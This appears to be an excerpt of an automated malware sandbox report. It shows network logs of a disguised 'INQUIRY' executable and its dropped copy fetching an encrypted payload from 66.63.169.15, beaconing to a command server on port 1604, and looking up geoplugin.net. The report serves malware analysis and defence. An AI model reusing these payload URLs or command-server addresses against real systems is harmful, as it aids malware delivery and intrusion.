                            May 27, 2024 09:08:19.074956894 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.074975967 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.074994087 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075010061 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075011969 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075031042 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075048923 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075067997 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075084925 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075088978 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075088978 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075103998 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075123072 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075141907 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075160027 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075176954 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075191975 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075193882 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075211048 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075241089 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075241089 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075268984 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075289011 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075325966 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075337887 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075436115 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075437069 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075460911 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075535059 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075555086 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.075556040 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.075660944 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.077075958 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077164888 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077264071 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077271938 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.077387094 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077414989 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.077431917 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077455997 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077523947 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077537060 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077548981 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077686071 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077749014 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077796936 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.077809095 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.078058958 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.078058958 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.078058958 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.078107119 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.078155041 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.080272913 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080401897 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080518961 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080543041 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080630064 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080756903 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080773115 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080853939 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.080966949 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081126928 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081163883 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.081214905 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081311941 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081325054 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.081335068 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081358910 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081478119 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081525087 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081540108 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:19.081676006 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.084378958 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:19.264067888 CEST8050599178.237.33.50192.168.11.20
                            May 27, 2024 09:08:19.264403105 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:08:22.969141960 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:22.969233990 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:23.073530912 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.073545933 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.073802948 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.073950052 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.074130058 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.074482918 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:23.074594975 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:23.178679943 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.178802013 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.178926945 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.189620972 CEST16045059764.188.26.202192.168.11.20
                            May 27, 2024 09:08:23.189860106 CEST505971604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:39.453840971 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:08:39.454782009 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:08:39.615242958 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:09:09.496556997 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:09:09.497431040 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:09:09.662102938 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:09:39.560308933 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:09:39.562207937 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:09:39.724814892 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:10:04.880099058 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:04.880099058 CEST5059580192.168.11.2066.63.169.15
                            May 27, 2024 09:10:05.064126015 CEST805059566.63.169.15192.168.11.20
                            May 27, 2024 09:10:05.064692974 CEST5059580192.168.11.2066.63.169.15
                            May 27, 2024 09:10:05.347891092 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:06.285202026 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:08.144129038 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:09.596487045 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:10:09.597532988 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:10:09.755481958 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:10:11.862106085 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:19.297977924 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:34.154098034 CEST5059980192.168.11.20178.237.33.50
                            May 27, 2024 09:10:39.642239094 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:10:39.643178940 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:10:39.802252054 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:11:09.712945938 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:11:09.713819981 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:11:09.880824089 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:11:39.761075974 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:11:39.762111902 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:11:39.926995039 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:12:09.813767910 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:12:09.814789057 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:12:09.973948002 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:12:39.843245029 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:12:39.844145060 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:12:40.005177021 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:13:09.884798050 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:13:09.885695934 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:13:10.036472082 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:13:39.945291996 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:13:39.946191072 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:13:40.114382029 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:14:10.009716034 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:14:10.010639906 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:14:10.161237955 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:14:40.079121113 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:14:40.079951048 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:14:40.239515066 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:15:10.150415897 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:15:10.151222944 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:15:10.317414999 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:15:40.191976070 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:15:40.192823887 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:15:40.348599911 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:16:10.244659901 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:16:10.245114088 CEST505961604192.168.11.2064.188.26.202
                            May 27, 2024 09:16:10.410918951 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:16:40.294075012 CEST16045059664.188.26.202192.168.11.20
                            May 27, 2024 09:16:40.338934898 CEST505961604192.168.11.2064.188.26.202
                            TimestampSource PortDest PortSource IPDest IP
                            May 27, 2024 09:08:17.782757998 CEST5789353192.168.11.201.1.1.1
                            May 27, 2024 09:08:17.884111881 CEST53578931.1.1.1192.168.11.20
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            May 27, 2024 09:08:17.782757998 CEST192.168.11.201.1.1.10x7e82Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            May 27, 2024 09:08:17.884111881 CEST1.1.1.1192.168.11.200x7e82No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                            • 66.63.169.15
                            • geoplugin.net
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.11.205059466.63.169.15807960C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 09:07:47.193059921 CEST174OUTGET /TBdmQwySFr136.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                            Host: 66.63.169.15
                            Cache-Control: no-cache
                            May 27, 2024 09:07:47.376132965 CEST1289INHTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Sun, 26 May 2024 23:55:20 GMT
                            Accept-Ranges: bytes
                            ETag: "ab7bf52ac8afda1:0"
                            Server: Microsoft-IIS/8.5
                            Date: Mon, 27 May 2024 07:07:47 GMT
                            Content-Length: 494656
                            Data Raw: 29 91 36 92 0d 7e 8c 58 c0 a4 23 d0 11 4a 85 91 7a c7 6a 2b 48 15 85 52 e6 fe b9 eb 71 a5 f3 b3 89 a0 50 b1 dc 7b 09 9f 63 f8 8a ba e3 22 7e 46 a3 c7 ed e2 d9 58 33 3a ac 6a 05 a2 3d a2 ef 7b 6e 4a 2a 91 a0 1b 14 9c 7b 53 58 ea ea 59 94 73 bd 62 9c ac 66 cf 0c f0 bf 8f 0b 00 f4 ea 87 71 77 a2 80 b0 f0 2c 5a dd d5 17 d3 da 19 c7 e1 60 fa 3b ee ce 77 64 9a c2 3f 48 bf 66 fa b8 ef 56 f8 ea 5c 8e b0 70 5d 34 24 fc 71 b1 a8 8b f8 79 99 ca 74 04 d3 06 5f fa 35 32 a2 42 94 41 7b 1b 99 41 fb 30 b6 c3 43 91 80 24 03 e0 3d 6a 56 28 1a 31 af de f6 88 70 fa 9b c3 fd 48 81 56 ba 65 b0 a5 00 8d c2 7f ba 79 d1 3d c2 b2 26 c1 c2 81 97 38 d1 4e 78 fb 28 77 d4 8a 6d 02 e7 ad 72 66 f5 fe 28 33 3d 39 21 f2 b5 a2 1e 57 95 d9 96 1e c9 2e c5 0e 2f 19 b3 97 b7 54 b1 2f 1b bb 93 9d 82 8a d0 59 e6 c1 df e0 b4 1c fa da 1e d7 61 db 8b f5 12 8d b3 db 0c 7c c8 73 5f 52 38 10 c5 c8 4a ab ad 48 cb b2 e7 b3 ac 95 3d 94 4c fa bc 60 22 e7 b2 b6 90 28 d8 ba 91 91 0b 23 68 ef df 3a 67 9e 14 22 14 30 29 e4 6d e2 59 28 2d ec f8 32 83 06 [TRUNCATED]
                            Data Ascii: )6~X#Jzj+HRqP{c"~FX3:j={nJ*{SXYsbfqw,Z`;wd?HfV\p]4$qyt_52BA{A0C$=jV(1pHVey=&8Nx(wmrf(3=9!W./T/Ya|s_R8JH=L`"(#h:g"0)mY(-2m k:k__y.>}pb{v:v0|t&,L#Vf#^)\b"k;I%2YpJt`3Bpe>9>E*;0z3"s,Ik./dy< !0-Q7ekML2.a@dU~T29>%R l7)fd";N4b\Py~jiCm}'!Hj#QzO_FF_DTAgL&'uM==Rl Ym7^=L?j|e+f.>Yz>bsaAqsL!pGk3Yz"D.@n"lyDymehYW<?b((3{QziK1((b2Bvl-dG7Jyn*_`"9~"^K7^|"PSr=|Vr.GB(K'68yg\^sG [TRUNCATED]
                            May 27, 2024 09:07:47.376257896 CEST1289INData Raw: e9 3b e3 28 ae 4a 79 ab 60 cd de 28 8c 45 a6 51 70 fc 4a ca d8 db f3 c3 26 22 f0 be f9 a8 4b 76 d2 a1 fe 0f 6a a2 f4 40 9a 74 26 72 8c 9a 77 6f 4d 1f c4 8d c2 05 aa 7e cf 8e 96 e4 29 42 61 35 63 3e 88 71 83 bc 0a de db 4d c0 73 c7 e6 31 fc 56 9f
                            Data Ascii: ;(Jy`(EQpJ&"Kvj@t&rwoM~)Ba5c>qMs1V$eh7hUt2{AIX=ES+%-%xt_@v%2v}Z|gzJ qkTlI-pV]leIIABq4ybODfh\J*
                            May 27, 2024 09:07:47.376323938 CEST1289INData Raw: 82 56 77 79 d3 1b 66 4b 75 39 21 8d ae d4 07 2e 92 6a 9c a2 38 49 e5 e6 5a b0 d8 a0 e3 10 0e 83 07 19 ad 89 6f 33 4c c7 16 88 51 df 41 70 3c c5 97 3c 51 8b 00 20 6e 0c 46 aa e3 03 46 90 50 d5 94 e3 95 95 79 bb 8d 67 31 76 22 43 33 1e 1a 12 b7 8a
                            Data Ascii: VwyfKu9!.j8IZo3LQAp<<Q nFFPyg1v"C3/f&]GM7"AU"5_MAcsrXI4J6})1C^4ga'k0tdev}jPJ=]b\zS!\berG
                            May 27, 2024 09:07:47.376420021 CEST1289INData Raw: 0d 7d b7 48 62 2f e1 21 ba cf 80 7f c2 aa df 0c e9 fa c4 d7 9d 5e 72 6b 97 7e ec 18 38 22 62 a1 c5 3d e5 3f b9 b6 40 d4 51 46 37 02 01 dc eb fb b5 ce 72 21 76 63 d6 88 d5 79 a4 ea 8b 56 87 17 23 97 dc ce 4f 58 b0 a3 ab 2d d7 d5 52 ed 9c 04 65 8b
                            Data Ascii: }Hb/!^rk~8"b=?@QF7r!vcyV#OX-Re<D MoY>/4]2^v|<RP'05w.:,Jt8O)5OLwpRzJrz$#G8#&_0f1u+$\7mg`8Ny.
                            May 27, 2024 09:07:47.558924913 CEST1289INData Raw: 6f b7 be 11 c1 49 76 d2 cb fe 65 6a 4a d7 32 99 cd 8e d6 ea 99 9f 13 28 1f ae e4 22 3a ec 7e 27 11 f4 6c c5 4a f1 07 42 7b 98 fa 92 38 e1 aa 81 4f d2 66 83 0e fe b9 61 9c af f7 bf 30 ad f5 cc 38 fa ed 70 8c eb 9b df 5b 1c cb cb 4f dc f5 22 3b fb
                            Data Ascii: oIvejJ2(":~'lJB{8Ofa08p[O";_.hOuLyS2\dJyn1#YGu!sc*mvIwoT156=GW=3z$hl.&}?yG;\/ N#D6q=7JP.+q:#`!j
                            May 27, 2024 09:07:47.559005022 CEST1289INData Raw: 8b 4c 1a 97 dc 74 e1 ec 95 f8 4a 07 3d 9d d7 fe 63 c1 12 bd f3 a1 0a 74 5e 5b 00 40 98 c7 4a 61 be 52 32 02 bf 8e 19 5c e3 4f ab 7a bb b8 57 3b fd ca f1 70 2c 19 ed 9a 6d 14 e7 e0 24 cc d0 64 53 aa 02 2b 1d 21 30 88 c1 25 da 6c 11 1e 37 65 36 e4
                            Data Ascii: LtJ=ct^[@JaR2\OzW;p,m$dS+!0%l7e6=M9d]"%dyAmz 2t?@alvB^c%AJOqOcUaEL#X|j[VvJd6V*Il%7{z7>1-1J
                            May 27, 2024 09:07:47.559065104 CEST1289INData Raw: b2 23 0f 1f 9f 09 1b 4e 79 17 db 84 19 d9 3f 86 bb 23 cf 02 9d 9b 80 f2 ba 92 d7 87 f8 6a 7a 56 98 4c f9 23 22 b7 74 77 32 dc f5 3c bb ea e8 bf 63 fe b6 0d 47 8b 41 88 87 9f 7f dd 6a a5 27 b3 95 95 ba ce 46 ea e8 61 aa 19 c6 01 d8 3a dd 66 b3 19
                            Data Ascii: #Ny?#jzVL#"tw2<cGAj'Fa:fliZJE=d7Tw(&E__GvAxZ7;@q<]/E=t]K'a|1Z:OR+P;?n;sR|=qEo=5&UIv3r
                            May 27, 2024 09:07:47.559124947 CEST1289INData Raw: c6 1a be 5e e3 81 53 f6 ad 0f b0 f3 5d 73 9c b7 c3 b3 63 03 70 df 24 51 f6 00 7d 92 fd b6 89 18 cc c3 a8 52 6b f9 0e 60 71 cb 86 55 e9 9b 8e e3 ea c8 da 4f 85 6e 7f bf d2 0c 09 3e 17 5b 23 5d be 1c 91 92 74 57 e8 9d df 2d 23 25 45 64 40 ad 3b 9c
                            Data Ascii: ^S]scp$Q}Rk`qUOn>[#]tW-#%Ed@;SvdS[5eKq3m,J'g@Uk/%L998tsAH[ex"RIC!d08t\f%~,KuN{H"Dq\Wdf7?[
                            May 27, 2024 09:07:47.559181929 CEST1289INData Raw: 38 71 f6 37 c7 d5 7a 27 ff d0 af cd 3c 86 7c 89 30 a8 7a eb 68 41 a0 db 4b ab 73 2c 49 9f ab 41 48 e1 63 ef 24 be 64 53 aa ba b1 5d dd bb 18 53 c5 ab 75 ae e2 67 e8 f0 ec 20 27 06 4d 4c fa 4f cc 73 0e 29 2e 61 cb b7 e9 d8 04 d0 d3 8c 07 80 81 6e
                            Data Ascii: 8q7z'<|0zhAKs,IAHc$dS]Sug 'MLOs).anP L6:ZJ=sw+Ol_E2Gg.|q>K<\AgY-yqZ`n,vD!OIlq&2aLVieNmz/l~'u
                            May 27, 2024 09:07:47.559237957 CEST1289INData Raw: 72 20 5d c8 92 ae 35 4b 4e 15 25 de 0c db a4 e9 34 10 11 4b 57 ad 2b 05 74 90 cb 55 6e 4f 9c 74 45 02 6e 3d ad f7 be 6d 85 31 00 ae 3a ee c1 5a 40 55 09 4d 58 dd 05 0e 0e bf ec 5a b4 5a 67 84 04 fb 3a 64 70 a1 ca 2e c5 69 d6 37 d1 fb a3 65 f5 30
                            Data Ascii: r ]5KN%4KW+tUnOtEn=m1:Z@UMXZZg:dp.i7e0g\O)(Y-_BIm:a2*DYEx39FOgP,<"j8KKtW1<Llxg?1c984awT:%+2"d^bGlmw=cM+En
                            May 27, 2024 09:07:47.559294939 CEST1289INData Raw: f3 6b cc 26 45 9e 11 20 13 6c 10 24 3b bb 5f 23 ca 91 b0 16 64 dc cc 7f 06 d9 8a 8c 44 86 5b c4 d4 0a f9 14 c9 9b ad 6d c4 6e 34 35 97 e4 ff 3a 7e cb cd 19 31 15 8c 7d 7b 40 9f b4 e7 52 48 7d b6 78 73 e1 80 ce 28 5a 27 6f f8 98 67 65 57 1e f1 d9
                            Data Ascii: k&E l$;_#dD[mn45:~1}{@RH}xs(Z'ogeW@mJ'6Cy,U_Jzjj-T9\#5]DoCt!eES%Vfj;i*lz:\>y.'h#&8gl-sUAdnb>;/!."


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.11.205059566.63.169.15805908C:\ProgramData\Vexplo\Vexploio.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 09:08:15.079525948 CEST174OUTGET /TBdmQwySFr136.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                            Host: 66.63.169.15
                            Cache-Control: no-cache
                            May 27, 2024 09:08:15.264982939 CEST1289INHTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Sun, 26 May 2024 23:55:20 GMT
                            Accept-Ranges: bytes
                            ETag: "ab7bf52ac8afda1:0"
                            Server: Microsoft-IIS/8.5
                            Date: Mon, 27 May 2024 07:08:15 GMT
                            Content-Length: 494656
                            Data Raw: 29 91 36 92 0d 7e 8c 58 c0 a4 23 d0 11 4a 85 91 7a c7 6a 2b 48 15 85 52 e6 fe b9 eb 71 a5 f3 b3 89 a0 50 b1 dc 7b 09 9f 63 f8 8a ba e3 22 7e 46 a3 c7 ed e2 d9 58 33 3a ac 6a 05 a2 3d a2 ef 7b 6e 4a 2a 91 a0 1b 14 9c 7b 53 58 ea ea 59 94 73 bd 62 9c ac 66 cf 0c f0 bf 8f 0b 00 f4 ea 87 71 77 a2 80 b0 f0 2c 5a dd d5 17 d3 da 19 c7 e1 60 fa 3b ee ce 77 64 9a c2 3f 48 bf 66 fa b8 ef 56 f8 ea 5c 8e b0 70 5d 34 24 fc 71 b1 a8 8b f8 79 99 ca 74 04 d3 06 5f fa 35 32 a2 42 94 41 7b 1b 99 41 fb 30 b6 c3 43 91 80 24 03 e0 3d 6a 56 28 1a 31 af de f6 88 70 fa 9b c3 fd 48 81 56 ba 65 b0 a5 00 8d c2 7f ba 79 d1 3d c2 b2 26 c1 c2 81 97 38 d1 4e 78 fb 28 77 d4 8a 6d 02 e7 ad 72 66 f5 fe 28 33 3d 39 21 f2 b5 a2 1e 57 95 d9 96 1e c9 2e c5 0e 2f 19 b3 97 b7 54 b1 2f 1b bb 93 9d 82 8a d0 59 e6 c1 df e0 b4 1c fa da 1e d7 61 db 8b f5 12 8d b3 db 0c 7c c8 73 5f 52 38 10 c5 c8 4a ab ad 48 cb b2 e7 b3 ac 95 3d 94 4c fa bc 60 22 e7 b2 b6 90 28 d8 ba 91 91 0b 23 68 ef df 3a 67 9e 14 22 14 30 29 e4 6d e2 59 28 2d ec f8 32 83 06 [TRUNCATED]
                            Data Ascii: )6~X#Jzj+HRqP{c"~FX3:j={nJ*{SXYsbfqw,Z`;wd?HfV\p]4$qyt_52BA{A0C$=jV(1pHVey=&8Nx(wmrf(3=9!W./T/Ya|s_R8JH=L`"(#h:g"0)mY(-2m k:k__y.>}pb{v:v0|t&,L#Vf#^)\b"k;I%2YpJt`3Bpe>9>E*;0z3"s,Ik./dy< !0-Q7ekML2.a@dU~T29>%R l7)fd";N4b\Py~jiCm}'!Hj#QzO_FF_DTAgL&'uM==Rl Ym7^=L?j|e+f.>Yz>bsaAqsL!pGk3Yz"D.@n"lyDymehYW<?b((3{QziK1((b2Bvl-dG7Jyn*_`"9~"^K7^|"PSr=|Vr.GB(K'68yg\^sG [TRUNCATED]
                            May 27, 2024 09:08:15.265012026 CEST1289INData Raw: e9 3b e3 28 ae 4a 79 ab 60 cd de 28 8c 45 a6 51 70 fc 4a ca d8 db f3 c3 26 22 f0 be f9 a8 4b 76 d2 a1 fe 0f 6a a2 f4 40 9a 74 26 72 8c 9a 77 6f 4d 1f c4 8d c2 05 aa 7e cf 8e 96 e4 29 42 61 35 63 3e 88 71 83 bc 0a de db 4d c0 73 c7 e6 31 fc 56 9f
                            Data Ascii: ;(Jy`(EQpJ&"Kvj@t&rwoM~)Ba5c>qMs1V$eh7hUt2{AIX=ES+%-%xt_@v%2v}Z|gzJ qkTlI-pV]leIIABq4ybODfh\J*
                            May 27, 2024 09:08:15.265034914 CEST1289INData Raw: 82 56 77 79 d3 1b 66 4b 75 39 21 8d ae d4 07 2e 92 6a 9c a2 38 49 e5 e6 5a b0 d8 a0 e3 10 0e 83 07 19 ad 89 6f 33 4c c7 16 88 51 df 41 70 3c c5 97 3c 51 8b 00 20 6e 0c 46 aa e3 03 46 90 50 d5 94 e3 95 95 79 bb 8d 67 31 76 22 43 33 1e 1a 12 b7 8a
                            Data Ascii: VwyfKu9!.j8IZo3LQAp<<Q nFFPyg1v"C3/f&]GM7"AU"5_MAcsrXI4J6})1C^4ga'k0tdev}jPJ=]b\zS!\berG
                            May 27, 2024 09:08:15.265152931 CEST1289INData Raw: 0d 7d b7 48 62 2f e1 21 ba cf 80 7f c2 aa df 0c e9 fa c4 d7 9d 5e 72 6b 97 7e ec 18 38 22 62 a1 c5 3d e5 3f b9 b6 40 d4 51 46 37 02 01 dc eb fb b5 ce 72 21 76 63 d6 88 d5 79 a4 ea 8b 56 87 17 23 97 dc ce 4f 58 b0 a3 ab 2d d7 d5 52 ed 9c 04 65 8b
                            Data Ascii: }Hb/!^rk~8"b=?@QF7r!vcyV#OX-Re<D MoY>/4]2^v|<RP'05w.:,Jt8O)5OLwpRzJrz$#G8#&_0f1u+$\7mg`8Ny.
                            May 27, 2024 09:08:15.449435949 CEST1289INData Raw: 6f b7 be 11 c1 49 76 d2 cb fe 65 6a 4a d7 32 99 cd 8e d6 ea 99 9f 13 28 1f ae e4 22 3a ec 7e 27 11 f4 6c c5 4a f1 07 42 7b 98 fa 92 38 e1 aa 81 4f d2 66 83 0e fe b9 61 9c af f7 bf 30 ad f5 cc 38 fa ed 70 8c eb 9b df 5b 1c cb cb 4f dc f5 22 3b fb
                            Data Ascii: oIvejJ2(":~'lJB{8Ofa08p[O";_.hOuLyS2\dJyn1#YGu!sc*mvIwoT156=GW=3z$hl.&}?yG;\/ N#D6q=7JP.+q:#`!j
                            May 27, 2024 09:08:15.449526072 CEST1289INData Raw: 8b 4c 1a 97 dc 74 e1 ec 95 f8 4a 07 3d 9d d7 fe 63 c1 12 bd f3 a1 0a 74 5e 5b 00 40 98 c7 4a 61 be 52 32 02 bf 8e 19 5c e3 4f ab 7a bb b8 57 3b fd ca f1 70 2c 19 ed 9a 6d 14 e7 e0 24 cc d0 64 53 aa 02 2b 1d 21 30 88 c1 25 da 6c 11 1e 37 65 36 e4
                            Data Ascii: LtJ=ct^[@JaR2\OzW;p,m$dS+!0%l7e6=M9d]"%dyAmz 2t?@alvB^c%AJOqOcUaEL#X|j[VvJd6V*Il%7{z7>1-1J
                            May 27, 2024 09:08:15.449598074 CEST1289INData Raw: b2 23 0f 1f 9f 09 1b 4e 79 17 db 84 19 d9 3f 86 bb 23 cf 02 9d 9b 80 f2 ba 92 d7 87 f8 6a 7a 56 98 4c f9 23 22 b7 74 77 32 dc f5 3c bb ea e8 bf 63 fe b6 0d 47 8b 41 88 87 9f 7f dd 6a a5 27 b3 95 95 ba ce 46 ea e8 61 aa 19 c6 01 d8 3a dd 66 b3 19
